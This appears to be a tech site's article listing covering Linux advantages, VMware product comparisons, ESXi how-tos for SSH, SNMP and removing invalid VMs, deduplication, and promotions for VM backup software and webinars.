Runtime errors and crashes are quite rare on the Linux operating system due to the way its kernel is designed and the way processes are allowed to access it. No one can guarantee that your Linux desktop or server will not crash at all, because that would be a bit extreme, however, we can say that it happens a lot less frequently in comparison with other operating systems such as Windows.

For the fanatics of the 'blue screen of death' - you'll be disappointed to find out there is no such thing in the world of Linux. However, not all is lost as there have been some really good 'blue screen of death' screen savers out for the Linux graphical X Windows system.

You could also say that evidence of the operating system's stability is the fact that it's the most widely used operating system for running important services in public or private sectors. Worldwide statistics show that the number of Linux web servers outweigh by far all other competitors:

linux-introduction-why-use-linux-1

Today, netcraft reports that for the month of June 2005, out of a total of 64,808,485 Web servers, 45,172,895 are powered by Apache while only 13,131,043 use Microsoft's IIS Web server!

•Linux is much more secure than Windows, there are almost no viruses for Linux and, because there are so many people working on Linux, whenever a bug is found, a fix is provided much more quickly than with Windows. Linux is much more difficult for hackers to break into as it has been designed from the ground up with security in mind.

•Linux uses less system resources than Windows. You don't need the latest, fastest computer to run Linux. In fact you can run a functional version of Linux from a floppy disk with a computer that is 5-6 years old! At this point, we can also mention that one of our lab firewalls still runs on a K6-266 -3DNow! processor with 512 MB Ram! Of course - no graphical interfaces are loaded as we only work on in CLI mode!

•Linux has been designed to put power into the hands of the user so that you have total control of the operating system and not the other way around. A person who knows how to use Linux has the computer far more 'by the horns' than any Windows user ever has.

•Linux is fully compatible with all other systems. Unlike Microsoft Windows, which is at its happiest when talking to other Microsoft products, Linux is not 'owned' by any company and thus it keeps its compatibility with all other systems. The simplest example of this is that a Windows computer cannot read files from a hard-disk with the Linux file system on it (ext2 & ext3), but Linux will happily read files from a hard-disk with the Windows file system (fat, fat32 or ntfs file system), or for that matter any other operating system.

Now that we've covered some of the benefits of using Linux, let's start actually focusing on the best way to ease your migration from the Microsoft world to the Linux world, or in case you already have a Linux server running - start unleashing its full potential!

The first thing we will go over is the way Linux deals with files and folders on the hard-disk as this is completely different to the way things are done in Windows and is usually one of the challenges faced by Linux newbies.

 



  • Hits: 31567
Install Windows 11 on VMware ESXi

Ultimate Guide: Install Windows 11 on VMware ESXi – Easily Bypass TPM Security Requirement

Windows 11 Installation on VMware ESXiIn this article, we’ll show you how to setup or install Microsoft Windows 11 on VMware’s ESXi servers and bypass the Trusted Platform Module version 2.0 (TPM 2.0) requirement. We've also made the TPM bypass ISO image available as a free download.

 

Key Topics:

Download now your free copy of the latest V9 VM backup now.

VMware ESXi – TPM – vTPM and Windows 11

Trusted Platform Module version 2.0 (TPM 2.0) is required to run Microsoft’s Windows 11. This restricts the operating system’s installation on newer PCs, it also means users with older hardware are likely to be forced to upgrade. While the virtualization world is often more forgiving when it comes to hardware requirements, trying to install Windows 11 on VMware’s ESXi platform usually present the error: “This PC can’t run Windows 11”: 

Windows 11 Installation Error in VMware ESXiWindows 11 Installation Error in VMware ESXi

Running Windows 11 as a virtual machine on VMware ESXi requires a virtual Trusted Platform Module (vTPM) present. For more details on Microsoft Windows 11 requirements see, https://docs.microsoft.com/en-us/windows/whats-new/windows-11-requirements.

While VMware supports vTPM and doesn’t require a physical TPM 2.0 chip, to use it, you need to configure a number of different services, depending on your VMware Platform version, including vCenter, vSphere Native Key Provider and more, making it a complicated task – especially for those running home labs. For more details see, https://core.vmware.com/resource/windows-11-support-vsphere#section2.

The next steps will take you through downloading the TPM ISO image used to bypass the Windows TPM check.

VMware ESXi, Download, Windows 11, TPM bypass, Installation

Continue reading

  • Hits: 1379

8 Critical Features to Have in a VM Backup Solution

vm backup key featuresBusinesses that rely on virtual machines for their day-to-day operations should think twice about securing their infrastructure. Modern use of virtual machines stems from the benefits of virtualization, which include accessibility, reduced operating costs, and flexibility, among others. But your virtual infrastructure becomes obsolete without proper security. One way to achieve that is through virtual machine backup and recovery solutions.

VM backups are crucial for maintaining business continuity. They help businesses prevent data loss and offer a failsafe if something happens to your Hyper-V or VMware virtual infrastructure. These services aren't uncommon. But knowing which one to choose depends on several factors. None are more important than the product's features, which directly impact your ability to keep the infrastructure running.

So that begs the question, what are the essential features of a VM backup software? That's exactly what this short guide focuses on. So, let's dive in.

Key Topics:

Download now your free copy of the latest V9 VM backup now.

Ransomware Protection

Ransomware attacks are making the rounds, and cybersecurity blogs and experts talk extensively regarding the potential damage these attacks can do. A potential ransomware attack can render your data obsolete, locking it and demanding a ransom for releasing said data. Therefore, it becomes a necessity to protect against potential ransomware attacks. Luckily, ransomware protection is a core feature of the V9 VM backup.

The feature makes it impossible for malicious software to tamper with the data on your virtual machines. Moreover, the ransomware data protection feature prevents any user, even with admin or root access, from modifying or deleting the backup data on your backup server. With this level of protection against devastating malware, businesses add another layer of security to their virtual environment.

Storage Saving With Augmented Inline Deduplication Technology

Storage costs are a significant concern for businesses, and choosing a VM backup provider that offers massive storage-saving features is essential. Few storage-saving features are as comprehensive as the Augmented Inline Deduplication Technology with the V9 VM Backup. The feature works by eliminating redundant data, resulting in significant storage savings.

This technology uses machine learning to identify the changed data from the previous backup, thus backing up only the changed data to the customers' backup server or repository. In comparison, most VM backup and restore services approach the backup process differently, removing identical data after the transfer to the backup repository.

The benefits of the technology result in massive storage savings.

Cloud Backup

Continue reading

  • Hits: 8229

Differences Between VMware vSphere, vCenter, ESXi Free vs ESXi Paid, Workstation Player & Pro

vmware esxi vsphere vcenter introIn this article we will cover the differences between VMware ESXi, vSphere and vCenter while also explain the features supported by each vSphere edition: vSphere Standard, Enterprise plus and Plantium edition. We will touch on the differences and limitations between VMware Workstation Player and VMware Workstation Pro, and also compare them with EXSi Free and EXSi Paid editions.

Finally we will demystify the role of vCenter and the additional features it provides to a VMware infrastructure.

Key Topics:

Visit our Virtualization and Backup section for more high-quality technical articles.

vmware vsphere

Concerned about your VM machines and data? Download now your Free Enterprise-grade VM Backup solution

Related Articles:

Difference Between VMware vSphere & vCenter

It’s sometimes difficult to keep up to date with the latest names of software. Even the largest technology vendors change their product names from time to time. Unfortunately, getting the product name wrong can result in various costly consequences including purchasing the wrong product or an older version with differentiating feature sets.

Contrary to popular belief, vSphere and vCenter are actually different products:

  • vSphere is VMware’s name for a suite of Infrastructure products. You can think of it as a platform name which includes lots of different components.
  • vCenter is the name of one of the components under the vSphere suite. vCenter runs on a Windows Server VM and provides the management and control plane of the entire VMware environment. This is also shown in the diagram below:

differences between vsphere and vcenter

Looking at the vSphere suite, the components and features that vSphere includes depend on your licenses. vCenter Server is available on all vSphere editions.

Here is an overview of some features for the main vSphere editions:

vmware vsphere editions feature comparisonYou will notice that this vSphere feature table contains many different technologies which are found in different VMware software components.

vCenter is a management tool that helps manage multiple ESXi / vSphere Hypervisors within the datacentre. Earlier versions of vCenter (also known as vCenter Server) ran exclusively on Windows Server (shown in the previous diagram) whereas now VMware now offers the vCenter Server Appliance (vCSA) which runs on either SUSE Linux Enterprise Server 64-bit (vCSA v6.0) or VMware’s proprietary Photon OS (vCSA v6.5 and above).

You log in to vCenter Server via an HTML5 browser (formally a Flash client) which looks like this:

vmware vsphere login

From here, we can manage all vSphere related components (and their corresponding features) which include:

  • vCenter Server (vCSA)
  • vSphere Hypervisors (ESXi Servers)
  • vSphere Update Manager
  • vSphere Replication

So, in summary, the difference between vSphere and vCenter is that vSphere consists of a suite of VMware components with vCenter Server being one of those.

vCenter Server is the management software or if you prefer, tool, to help manage your vSphere Components and all their features.

You can use some vSphere components without a vCenter Server but some features will not be available.

What is VMware ESXi?

ESXi is a Type-1 Hypervisor which means it’s a piece of software that runs directly on a bare-metal server without the requirement of an operating system. As a Hypervisor, ESXi manages access to all physical resources such as CPUs, memory, network interface cards, storage (HDD, SSDs etc) and other.

ESXi’s vmkernel sits between the virtual machines and physical hardware and from there it shares the available hardware including CPUs, storage (HDDs, SSDs etc), memory and network interfaces of the physical host amongst the multiple virtual machines. Applications running in virtual machines can access these resources without direct access to the underlying hardware.

Vmkernel is the core software responsible of receiving requests from virtual machines for resources and presenting the requests to the physical hardware.

There are stricter compatibility requirements for ESXi installations as hardware drivers need to be certified. However once ESXi is installed and operational, you get access to Enterprise-grade Virtual Machines features.

vmware esxi server web guiVMware ESXi GUI Interface - Click to enlarge

VMware ESXi comes in a variety of flavours. A free version exists if you simply need to deploy basic Virtual Machines with no High Availability or central management requirements. This is best suited for trialling software and labs which are not in production.

For mission-critical applications, you should consider the paid version of ESXi which comes with VMware support and features geared toward professional environments. Add on VMware’s  vCenter Server enable central management all of your ESXi servers and take your datacentre one step further with features such as:

  • Clustering
  • High Availability
  • Fault Tolerance
  • Distributed Resource Scheduler
  • Virtual Machine Encryption

Difference Between VMware ESXi Free & ESXi Paid Version

The VMware ESXi free vs ESXi paid debate comes up a lot, but fortunately, it is easily answered.

The question to ask yourself is if you are planning to run mission-critical applications on top of ESXi. By mission-critical we mean applications that your business depends on. If the answer is yes, then you will require the paid version of ESXi with support so that you can contact VMware should anything go wrong.

Even if the answer is no, you might still consider a paid version of ESXi if you need the management functions of vCenter Server. Such use cases might be large development companies who don’t consider their test and development environments mission-critical but they do want a way to manage hundreds or thousands of Virtual Machines.

VMware ESXi free is still feature-rich though. Therefore for a small environment where your business won’t grind to a halt if an ESXi server goes offline, might be cost-effective even with additional manual management tasks to conduct. Keep in mind though that backup features will not be available in the free version, meaning that native backup via ESXi won’t be possible. You can work around this by installing and managing backup agents within your operating systems. This is one example of management overhead that you wouldn’t have with a paid version.

When Do You Need vCenter?

It’s worth keeping in mind that even with a paid version of ESXi, you will still need a vCenter Server license to use any clustering features. A paid version of ESXi does offer some benefits (such as VADP backup abilities) but without a vCenter Server license, most of the benefits are not available.

Almost all customers of paid ESXi licenses will also purchase a vCenter Server license so that those licenses ESXi servers can be centrally managed. Once all ESXi servers are managed by vCenter Server, you unlock all the ESXi features that you are licensed for.

So when do you need a vCenter Server? The answer is simple. To unlock features such as Clustering, High Availability (an automatic reboot of VMs on a failed host to a healthy host), Cloning and Fault Tolerance. If you are looking to add other VMware solutions to the datacentre including vSAN, vSphere Replication or Site Recovery Manager, then all of those solutions require access to a vCenter Server.

In summary, if you find that you need the paid ESXi version then you are most likely also going to need a vCenter Server license too. Fortunately, VMware provides discounted  Essentials and Essentials Plus bundles with a 3 host (physical servers) limit, these bundles include ESXi and a vCenter server license at a discounted rate to keep initial costs down.

Just by looking at the vSphere Client can you see the various vCenter related options which show the value added by bolting on vCenter to your stack of management software for your datacentre:

vmware vsphere client
VMware vsphere client - Click to enlarge

VMware Workstation Player vs VMware Workstation Pro

VMware Workstation Player is free software that lets you run a Virtual Machine on top of your own Windows PC’s Operating System. There are two versions of VMware Workstation Player; Workstation Player and Workstation Pro.

The key differences between these two versions are that with VMware Workstation Player you can only run one Virtual Machine on your computer at once and enterprise features are disabled.  VMware Workstation Pro on the other hand supports running multiple virtual machines at the same time plus a few more neat features mentioned below.

Here is what Workstation Pro looks like - notice how you can have many virtual machines running at once:

vmware workstation pro VMware Workstation Pro - Click to enlarge

VMware Workstation is essentially an application installed on top of Windows which lets you run connected or isolated Virtual Machines. It’s best suited for developer’s who need access and control to deploy and test code or for systems administrators looking to test applications on the latest version of a particular Operating System, of which over 200 are supported in Workstation Player and Pro.

We’ve already explained that Workstation Player is the free version of Workstation Pro but when it comes to functional differences we’ve detailed those for you below:vmware player workstation pro feature comparisonVMware Workstation Player and Pro both get installed onto your Windows PC or Laptop, on which you can run your virtual machines. Pro is interesting because you can run as many Virtual Machines as your Windows PC or Laptop hardware can handle making it a great bit of software for running live product demonstrations or testing without needing access to remote infrastructure managed by another team. The key element here is to ensure your laptop or PC has enough resources available (CPU/Cores, RAM and HDD space) for the Virtual Machines that will be running on it.

Diving into some of the features that VMware Workstation Pro provides shows how much value for money that software is; Being able to take a snapshot of Virtual Machines is useful so that you can roll back a Virtual Machine to a particular date and time in just a few seconds. You can also clone Virtual Machines should you need many copies of the same VM for testing. Encryption is also available in the event that your local Virtual Machines contain sensitive information.

VMware Workstation Pro is, therefore, a mini version of ESXi, it’s not capable of clustering features but it is an extremely cost-effective way (Approximately $300 USD) to make use of some of the unused resources on your Windows machine.

Summary

In summary here are our definitions for everything covered in this article:

  • vSphere: vSphere is a naming convention or “brand” for a selection of VMware Infrastructure solutions including vCenter Server, ESXi, vSphere Replication and Update Manager.
  • vCenter Server: vCenter Server is one of the solutions under the vSphere suite. It is used to manage multiple ESXi servers and enabled cluster level and high availability features for ESXi servers and Virtual Machines. vCenter Server is generally purchased when paid versions of ESXi have been deployed.
  • Workstation Player: Workstation Player is free software by VMware that lets you run one Virtual Machine at a time within your Windows Operating System.
  • Workstation Pro: Workstation Pro is the same as Workstation Player but it requires a paid license which enables enterprise features such as the ability to run many Virtual Machines from your Windows PC or Laptop. Features such as Virtual Machine snapshots, cloning and encryption are also supported with Pro.
  • ESXi: ESXi is the enterprise-grade solution for running Virtual Machines in the datacentre. It is installed onto bare metal servers. There is a basic free version, suitable for labs and test environments but the paid versions are more suitable for running mission-critical virtual machines and applications for your business, enabling cluster level features such as High Availability.
  • Hits: 62352

5 Most Critical Microsoft M365 Vulnerabilities Revealed and How to Fix Them - Free Webinar

Microsoft 365 is an incredibly powerful software suite for businesses, but it is becoming increasingly targeted by people trying to steal your data. The good news is that there are plenty of ways admins can fight back and safeguard their Microsoft 365 infrastructure against attack.

5 Most Critical Microsoft M365 Vulnerabilities and How to Fix Them

This free upcoming webinar, on June 23 and produced by Hornetsecurity/Altaro, features two enterprise security experts from the leading security consultancy Treusec - Security Team Leader Fabio Viggiani and Principal Cyber Security Advisor Hasain Alshakarti. They will explain the 5 most critical vulnerabilities in your M365 environment and what you can do to mitigate the risks they pose. To help attendees fully understand the situation, a series of live demonstrations will be performed to reveal the threats and their solutions covering:

  • O365 Credential Phishing
  • Insufficient or Incorrectly Configured MFA Settings
  • Malicious Application Registrations
  • External Forwarding and Business Email Compromise Attacks
  • Insecure AD Synchronization in Hybrid Environments

This is truly an unmissable event for all Microsoft 365 admins!

The webinar will be presented live twice on June 23 to enable as many people as possible to join the event live and ask questions directly to the expert panel of presenters. It will be presented at 2pm CEST/8am EDT/5am PDT and 7pm CEST/1pm EDT/10am PDT.

 

  • Hits: 18551

The Backup Bible. A Free Complete Guide to Disaster Recovery, Onsite - AWS & Azure Cloud Backup Strategies. Best Backup Practices

onprem and cloud backupThe Free Backup Bible Complete Edition written by backup expert and Microsoft MVP Eric Siron, is comprised of 200+ pages of actionable content divided into 3 core parts, including 11 customizable templates enabling you to create your own personalized on-prem and cloud-based (AWS, Azure) backup strategy.

Part 1 and 2 are updated versions of previously released eBooks (Creating a Backup & Disaster Recovery Strategy and Backup Best Practices in Action) but Part 3 is a brand-new section on disaster recovery (Disaster Recovery & Business Continuity Blueprint) that includes tons of valuable insights into the process of gathering organizational information required to build a DR plan and how to carry it out in practical terms.

The Backup Bible is offered Free and is available for download here.

Let’s take a look at what’s covered:

The Backup Bible – Part 1: Fundamentals of Backup

Part 1 covers the fundamentals of backup and tactics that will help you understand your unique backup requirements. You'll learn how to:

  • Begin planning your backup and disaster recovery planning
  • Set recovery objectives and loss tolerances
  • Translate your business plan into a technically oriented outlook
  • Create a customized agenda for obtaining key stakeholder support
  • Set up a critical backup checklist

The Backup Bible – Part 2: Selecting your Backup Strategy

Part 2 shows you what an exceptional backup looks like on a daily basis and the steps you need to get there, including:

  • Choosing the Right Backup and Recovery Software
  • Setting and Achieving Backup Storage Targets
  • Securing and Protecting Backup Data
  • Defining Backup Schedules
  • Monitoring, Testing, and Maintaining Systems
  • Access both parts for free now and ensure you’re properly protecting your vital data today!

The Backup Bible – Part 3: Aligning Disaster Recovery Strategies to your Business Needs

Part 3 guides you through the process of creating a reliable disaster recovery strategy based on your own business continuity requirements, covering:

  • Understanding key disaster recovery considerations
  • Mapping out your organizational composition
  • Replication
  • Cloud solutions
  • Testing the efficacy of your strategy

the backup bible

One of the most useful features of The Backup Bible is the customizable templates and lists that enable the reader to put the theory into practice. These are found in the appendix but are linked in the text at the end of each relevant chapter. If you are going to read this book cover to cover it would be a good idea to fill out the templates and lists as you go through it, so by the time you’ve finished reading you’ll have a fully personalized backup action plan ready for you to carry out!

Sure, it’s not the most exciting aspect of an IT administrator’s job but having a reliable and secure backup and disaster recovery strategy could be the most important thing you do. I’m sure you’ve heard many data loss horror stories that have crippled organizations costing thousands, if not millions, of dollars. This free eBook from Altaro will make sure you’re not the next horror story victim.

Summary

The Backup Bible Complete Edition also works as a great reference guide for all IT admins and anyone with an interest in protecting organizational data. And the best thing of all: it’s free! Learn how to create your own backup and disaster recovery plan, protect and secure your data backup for both onsite/on-premises and cloud-based (AWS and Azure) installations plus more. What are you waiting for? Download your copy now!

  • Hits: 6503

SysAdmin Day 2020 - Get your Free Amazon Voucher & Gifts Now!

sysadmin day 2020 amazon voucherSysAdmin Day has arrived, and with it, gratitude for all the unsung heroes that 2020 has needed. Your hard work has made it possible for all of us to keep going, despite all challenges thrown our way. Now it is Altaro’s turn to thank YOU.

If you are an Office 365, Hyper-V or VMware user, celebrate with Altaro. Just sign up for a 30-day free trial of either Altaro VM Backup or Altaro Office 365 Backup – it's your choice!

sysadmin day 2020 altaro
What can you Win?

  • Receive a €/£/$20 Amazon voucher when you use your trial of Altaro Office 365 Backup or Altaro VM Backup.
  • Get the chance to also win one of their Grand Prizes by sharing your greatest 2020 victory with Altaro in an up to 60-seconds video.

What are you waiting for? Sign up now!

  • Hits: 6826

How to Fix VMware ESXi Virtual Machine 'Invalid Status'

In this article, we'll show you how to deal with VMs which are reported to have an Invalid Status as shown in the screenshot below. This is a common problem many VMware and System Administrators are faced with when dealing with VMs. We'll show you how to enable SSH on ESXi (required for this task), use the vim-cmd to obtain a list of the invalid VMs, use the vim-cmd /vmsvc/unregister command to unregister - delete the VMs and edit the /etc/vmware/hostd/vmInventory.xml file to remove the section(s) that references the invalid VM(s).

The Invalid Status issue is usually caused after attempting to delete a VM, manually removing VM files after a vMotion, a problem with the VMFS storage or even after physically removing the storage from the ESXi host e.g replacing a failed hdd.

esxi vm machine invalid status

Another difficulty with VMs stuck in an Invalid Status is that VMware will not allow you to remove or delete any Datastore associated with the VM e.g if you wanted to remove a HDD. For safety reasons, you must first remove or migrate the affected VM so that there is no VM associated with the Datastore before VMware allows you to delete it.

Concerned about your VM machines and their data? Download now your Free Enterprise-grade VM Backup solution

Related Articles:

The screenshot below shows ESXi failing to delete datastore 256G-SSD - which is used by VM FCX-ISE1 above, now reported to be in an Invalid Status:

esxi vm unable to delete datastore

As most System Administrators discover in these situations - they are pretty much stuck and the only way to remove the VM, now marked as 'Invalid', is to delete it as the Unregister option cannot be selected when right clicking on top of the VM:

esxi vm invalid status delete unregister option unavailable

Notice in the screenshot above how the Unregister or Delete menu options are not available.

The only method to delete this VM is to use the SSH console on the ESXi host and execute a number of commands. This implies that SSH has been enabled on the ESXi host.

Read our quick guide on “How to enable SSH on an ESXi host” if SSH is not enabled on your ESXi host.

Once ssh is enabled, connect to your ESXi host with any ssh client such as e.g Putty using your ESXi root credentials, then use the vim-cmd with the following parameters to obtain a list of the invalid VMs:

[root@esxi1:~] vim-cmd vmsvc/getallvms | grep invalid
Skipping invalid VM '8'
[root@esxi1:~]

From the command output it is apparent that VM No.8 is the one we are after.  As a last attempt we can try to reload the VM in hope it will rectify the problem by executing the vim-cmd vmsvc/reload command:

[root@esxi1:~] vim-cmd vmsvc/reload 8
(vmodl.fault.SystemError) {
   faultCause = (vmodl.MethodFault) null,
   faultMessage = <unset>,
   reason = "Invalid fault"
   msg = "Received SOAP response fault from [<cs p:03d09848, TCP:localhost:80>]: reload
vim.fault.InvalidState"
}

Unfortunately, no joy. We now need to proceed to unregister/delete the VM using the vim-cmd /vmsvc/unregister command as shown below:

[root@esxi1:~] vim-cmd /vmsvc/unregister 8

Once the command is executed, the invalid VM will magically disappear from the ESXi GUI interface:

esxi vm machine invalid vm deleted

Another way to delete the VM is to edit the /etc/vmware/hostd/vmInventory.xml file and remove the section that references the invalid VM. In the snippet below we need to simply remove the highlighted text:

<ConfigRoot>
  <ConfigEntry id="0000">
    <objID>1</objID>
    <secDomain>23</secDomain>
    <vmxCfgPath>/vmfs/volumes/5a87661c-a465347a-a344-180373f17d5a/Voyager-DC/Voyager-DC.vmx</vmxCfgPath>
  </ConfigEntry>
  …………
  <ConfigEntry id="0008">
    <objID>8</objID>
    <secDomain>54</secDomain>
    <vmxCfgPath>/vmfs/volumes/   </vmxCfgPath>
  </ConfigEntry>

</ConfigRoot>

When finished, simply save the vmInventory.xml file.

Summary

This article showed how to deal with an ESXi VM that is in an invalid status. We explained possible causes of this issue, how to enable SSH on ESXi and the SSH commands required to reload or delete the invalid VM. Finally we saw how to delete a VM by executing the vim-cmd /vmsvc/unregister command or editing the vmInventory.xml XML file.

  • Hits: 75845

How to Enable SNMP on VMware ESXi Host & Configure ESXi Firewall to Allow or Block Access to the SNMP Service

In this article we will show you how to enable SNMP on your VMware ESXi host, configure SNMP Community string and configure your ESXi firewall to allow or block access to the SNMP service from specific host(s) or network(s)

Enabling SNMP service on a VMware ESXi host is considered mandatory in any production environment as it allows a Network Monitoring System (NMS) access and monitor the ESXi host(s) and obtain valuable information such as CPU, RAM and Storage usage, vmnic (network) utilization and much more.

how to enable snmp on esxi host

Furthermore, an enterprise grade NMS system can connect to your VMware infrastructure and provide alerting, performance and statistical analysis reports to help better determine sizing requirements but also identify bottlenecks and other problems that might be impacting the virtualization environment.

Execution Time: 10 minutes

Related Articles:

Concerned about your VM machines and data? Download now your Free Enterprise-grade VM Backup solution

Enable SSH on ESXi

First step it to enable SSH on ESXi. This can be easily perform via the vSphere client, ESXi console or Web GUI. All these methods are covered in details in our article How to Enable SSH on VMware ESXi.

Enable and Configure ESXi SNMP Service

Once SSH has been enabled, ssh to your ESXi host and use the following commands to enable and configure the SNMP service:

esxcli system snmp set --communities COMMUNITY_STRING
esxcli system snmp set --enable true

Replace “COMMUNITY_STRING” with the SNMP string of your choice.

Enable SNMP on ESXi Firewall

Next step is to add a firewall rule to allow inbound SNMP queries to the ESXi host. There are two scenarios here:

  • Allow traffic from everywhere
  • Allow traffic from specific hosts or networks

Allow SNMP Traffic from Everywhere

The below rules allow SNMP traffic from everywhere – all hosts and networks:

esxcli network firewall ruleset set --ruleset-id snmp --allowed-all true
esxcli network firewall ruleset set --ruleset-id snmp --enabled true

Allow SNMP Traffic from Specific Hosts or Networks

The below rules allow SNMP traffic from host 192.168.5.25 and network 192.168.1.0/24:

esxcli network firewall ruleset set --ruleset-id snmp --allowed-all false
esxcli network firewall ruleset allowedip add --ruleset-id snmp --ip-address 192.168.5.25
esxcli network firewall ruleset allowedip add --ruleset-id snmp --ip-address 192.168.1.0/24
esxcli network firewall ruleset set --ruleset-id snmp --enabled true

Block Host or Network from Accessing SNMP Service

To block a previously allowed host or network from accessing the SNMP service simply execute the following command(s):

esxcli network firewall ruleset allowedip remove --ruleset-id snmp --ip-address 192.168.5.25
esxcli network firewall ruleset allowedip remove --ruleset-id snmp --ip-address 192.168.1.0/24

Restart SNMP Service

Now that everything is configured, all we need to do is restart the SNMP service using the following command:

/etc/init.d/snmpd restart

Summary

In this article we explained the importance and usage of the SNMP Service for VMware ESXi Hosts and vCenter. We explained how to enable the SNMP Service on an ESXi host, configure the SNMP community string (public/private) and provided examples on how to configure the ESXi Firewall to control SNMP access to the ESXi host.

  • Hits: 18914

How to Enable or Disable SSH on VMware ESXi via Web GUI, vSphere Web GUI (vCenter), vSphere Client and Shell Console

SSH access to VMware’s ESXi server is by disabled by default however there are many reasons where SSH might be required. VMware and System administrators often find the need to perform advanced administrative tasks that require SSH access to the ESXi host. For example, deleting or reloading a VM with an Invalid Status can only be performed via SSH.

In this article, we’ll show you how to enable SSH on your ESXi host with just a few simple steps. This task can be achieved via the ESXi Web GUI, vSphere Web GUI (vCenter) vSphere client or ESXi console. We’ll cover all three methods.

Execution Time: 5 minutes

Security Tip: If your ESXi host management IP is not protected or isolated from the rest of the network, it is advisable to enable SSH on an as-needed basis.

Enabling and Disabling SSH Console on VMware ESXi via Web GUI

Log into your ESXi server and select the host from the Navigator window. Next, go to Action > Services and select the Enable Secure Shell (SSH) menu option:

vmware esxi enable ssh

This will immediately enable SSH. To disable SSH, repeat the same steps. You’ll notice that the Disable Secure Shell (SSH) option is now available:

vmware esxi disable ssh

Enabling and Disabling SSH on VMware via vSphere Web GUI Client (vCenter)

For those with a VMware vCenter environment, you can enable SSH for each ESXi host by selecting the host and then going to Manage > Settings > Security Profile > Edit.  In the pop-up window, scroll down to SSH Server and tick it. Optionally enter the IP address or network(s) you require to have SSH access to the host:

vmware esxi enable ssh vsphere web gui

Enabling and Disabling SSH on VMware ESXi via vSphere Client

Launch your vSphere client and log into your ESXi host. From vSphere, click on the ESXi host (1), then select the Configuration tab (2). From there, click on the Security Profile (3) under the Software section. Finally click on Properties:

vmware esxi enable ssh via vsphere client

On the pop-up window, select SSH and click on the Options button: vmware esxi enable ssh via vsphere client remote access

Select the required Startup Policy. Note that the ‘Start and stop with host’ option will permanently enable SSH. Next, click on the Start button under Service Commands to enable SSH immediately. When done, click on the OK button:

vmware esxi enable ssh via vsphere client start stop

To disable the SSH service via vSphere, follow the same process as above and ensure you select the “Start and stop manuallyStartup Policy option and click on the Stop button under the Service Commands section.

Enabling and Disabling SSH Console on VMware ESXi via ESXi Console

From your ESXi console, hit F2 to customise the system:

vmware esxi enable ssh via console

At the prompt, enter the ESXi root user credentials:

vmware esxi enable ssh via console

At the next window, highlight Troubleshooting Options and hit Enter:

vmware esxi enable ssh via console

Next, go down to the Enable SSH option and hit Enter to enable SSH: vmware esxi enable ssh via console

Notice that ESXi is now reporting that SSH is enabled:

vmware esxi enable ssh via console 5

Now hit Esc to exit the menu and logout from the ESXi host console.

Summary

In this article we showed how to enable and disable the SSH service on a VMware ESXi host using the Web GUI, vSphere client and ESXi Console. We explained why the SSH service is sometimes required to be enabled and also noted the security risks in permanently enabling SSH.

  • Hits: 34364

World Backup Day with Free Amazon Voucher and Prizes for Everyone!

Celebrate World Backup Day and WIN with Altaro!

We all remember how grateful we were to have backup software when facing so many data loss mishaps and near-catastrophes.

world backup day 2020 - win with altaro

If you manage your company's Office 365 data, celebrate this World Backup Day with Altaro. All you have to do is sign up for a 30-day free trial of Altaro Office 365 Backup. There’s a guaranteed Amazon voucher in it for you, and if you share your biggest backup mishap with them, you get a chance to WIN one of the grand prizes

  • DJI Mavic Mini Drone FlyCamQuadcopter,  
  • Google Stadia Premiere Edition, 
  • Ubiquity UniFiDream Machine  
  • Logitech MX Master 3 Advanced Wireless Mouse

What are you waiting for? Offer expires on the 22nd of April so  Sign up now!

Good luck & happy World Backup Day! 

 

  • Hits: 4348

Understanding Deduplication. Complete Guide to Deduplication Methods & Their Impact on Storage and VM Backups

data deduplication process vm backupWhen considering your VM backup solution, key features such as deduplication are incredibly important. This is not simply from a cost perspective but also an operational one. While is it true that deduplication of your backup data can have considerable cost savings for your business, it is also true that the wrong type of deduplication can often have negative performance and contribute to a negative end-user experience.

This article will explore the various deduplication types including general Inline Deduplication and Altaro’s Augmented Inline Deduplication for your VM Backup Storage. We'll also cover deduplication concerns such as software interoperability, disk wear, performance and other important areas.

Key Topics:

Concerned about your VM machines and their data? Download now your Free Enterprise-grade VM Backup solution

Related Articles:

Deduplication Basics

In fundamental terms, deduplication is the process of minimizing the amount of physical storage required for your data. In this article, we are using your VM backups as the data subject.

While physical storage costs are improving year on year, storage is still a considerable cost for any organization which is why deduplication techniques are being included into common data handing products such as backup software for your Virtual Machines.

There are various forms of deduplication available and it’s imperative to understand each one as all of them have various cost-saving vs performance trade-offs.

File-Based Deduplication

File-based deduplication was popular in the early days of deduplication however this method’s shortcomings became quickly apparent. With this method, files would be examined and checked to ensure identical files wouldn’t be stored a second time. The problem here was that much of a file could be identical to other files despite being named differently and having a different time-stamp. Furthermore other file-level differences would make the deduplication engine to mark the file as unique which would force the whole file to be backed up.

The end result is a significant amount of data being backed up multiple times, reducing the efficiency of the file-based deduplication engine.

Block-Level Deduplication

Block-level deduplication is the evolution of file-based deduplication which successfully addresses the shortcomings of its predecessor. With this method, the deduplication engine now examines the raw blocks of data on the filesystems themselves.  By concentrating on the raw blocks of data the deduplication engine no longer worries about the overall file a block is part of and can accurately understand the type of data the raw block contains.

The end result is a very efficient and intelligent deduplication engine that is capable of saving more space on the backup target.

To help better understand the block-level deduplication engine, we’ve included an example of how this process works with Altaro’s VM Backup solution.  Our example consists of 3 VMs and the diagram shows how each VM’s data is broken into different blocks (A to E).

In Phase 1, block-level deduplication is performed across each VM resulting in a significant saving of 110GB of space across all VMs. In Phase 2, block-level deduplication is performed across all VMs achieving an amazing 118GB reduction of storage space!

So far, Altaro’s VM Backup has saved 228GB of storage space which represents an impressive 47% reduction of VM Backup storage! In Phase 3, the deduplicated data is compressed to just 151GB and transferred to the backup storage.

block level deduplication vm backup

As noted in the diagram above, the overall VM backup storage requirements has been reduced from 481GB to just 151GB – representing a 68.8% reduction in size and allowing you to have more backups using much less storage space.

Download your free copy of Altaro's VM Backup Solution - Free for specific number of physical hosts!

Post-Process Deduplication

Compared to other deduplication options, post-process deduplication is a more simple form. All VM backup data is sent to the target storage device for your backups. After this, on a schedule, a process runs on the backup device to remove duplicated data.

post process deduplication

While this is simple in that no agents are required on your Virtual Machines, your target backup device will need to be large enough to cater for all backup data. Only after the data is there, will you see a reduction of data in time for the next day’s worth of backups.

Post-process is also problematic because you might need to enforce a “blackout window”, this being a period of time when you should not perform any backups because the storage device is busy moving data around and running the deduplication process.

The benefit of post-process deduplication though, is that it does deduplicate your data and not only on a per VM or per backup window but it often (depending on the implementation and vendor) will deduplicate across all backed up data. This can have a massive space-saving benefit, but only after the deduplication process has run.

Inline Deduplication

